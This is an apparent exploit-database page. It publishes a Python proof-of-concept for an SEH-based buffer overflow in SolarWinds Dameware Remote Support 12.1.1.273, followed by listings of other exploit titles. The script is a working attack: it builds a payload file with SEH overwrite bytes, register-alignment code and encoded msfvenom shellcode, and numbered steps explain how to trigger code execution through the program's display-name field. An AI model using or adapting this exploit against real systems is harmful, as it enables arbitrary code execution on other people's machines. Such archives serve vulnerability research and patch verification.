Menu

Search for hundreds of thousands of exploits

"Dameware Remote Support 12.1.1.273 - Buffer Overflow (SEH)"

Author

Exploit author

gurbanli

Platform

Exploit platform

windows

Release date

Exploit published date

2020-05-14

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
# Exploit Title: Dameware Remote Support 12.1.1.273 - Buffer Overflow (SEH)
# Exploit Author: gurbanli
# Date: 2020-05-13
# Vulnerable Software: Solarwinds Dameware Remote Support 12.1.1.273
# Vendor Homepage: https://www.solarwinds.com/
# Version: 12.1.1.273
# Software Link: https://downloads.solarwinds.com/solarwinds/Release/DameWare/v12.1.1/DamewareRS-St.exe
# Tested on: Windows 7 x86

"""
poc
1. Run exploit and copy contents of payload.txt
2. Open Dameware Remote Support
3. Click Add active directory support
4. Write any ip address in name or ip address field
5. paste payload .txt content to display name field and click ok
6. Click ok when error pops up
7. Click Yes in dialog box
8. calc pops up

Actually, i cant create this exploit with reliable exit, that's why calculator will be executed in background lol :D . but it is not big issue, the main thing is that arbitary code is executed 
"""


file = open('payload.txt','w')

max_length = 3604


padding_until_eax = '\x6e\x41' * 57 + '\x6e'
align_eax = (
"\x41" # padding (one byte)
"\x6e" # padding
"\x05\x14\x11" # add eax,11001400
"\x6e" # padding
"\x2d\x13\x11" # sub eax,11001300
)

'''
msfvenom -p windows/exec cmd=calc -f raw > shellcode.raw
./alpha2 eax --unicode --uppercase < shellcode.raw
'''

shellcode = 'PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLYXDBKPM0KPS0TIYUNQGPC4TKPPNPDK0RLLTK0RMDTKT2MXLO870JNF01KOFLOLQQSLLBNLMP7Q8OLMM1I7YRL22227DKR2LP4KOZOLTKPLLQRX9SQ8KQHQPQTKPYMPKQJ34KOYLXK3NZQ94KP44KKQXV01KOVLGQ8OLMKQ7WOHIPSEKFM3CML8OKSMMTRUK428DKPXMTM1HSC6TKLLPKTK0XMLKQYCTKKTTKM18PSYPDMTMT1KQK1QPYQJPQKOYPQO1O1J4KLRJKTM1MRJM1DMDEVRKPKPKPPPS8NQTK2OE7KOXUGKJPVUW2PVBH76EEGMUMKO9EOLKV3LLJCPKKK0RULEGKOWLS42RO1ZKPQCKOXUS3QQRL33KPA'



'''
ppr address 00b3007e (DNTU.exe)
'''

nSEH = '\x61\x6e' # unicode compatible padding
SEH = '\x7e\xb3'

payload = 'A' * 1764 + nSEH + SEH + align_eax + padding_until_eax + shellcode
payload += 'A' * (max_length-len(payload))

print('Payload length:{}'.format(len(payload)))

file.write(payload)
file.close()
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2020-05-14 "Dameware Remote Support 12.1.1.273 - Buffer Overflow (SEH)" local windows gurbanli
2020-05-13 "Remote Desktop Audit 2.3.0.157 - Buffer Overflow (SEH)" local windows gurbanli
2020-05-12 "LanSend 3.2 - Buffer Overflow (SEH)" local windows gurbanli 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected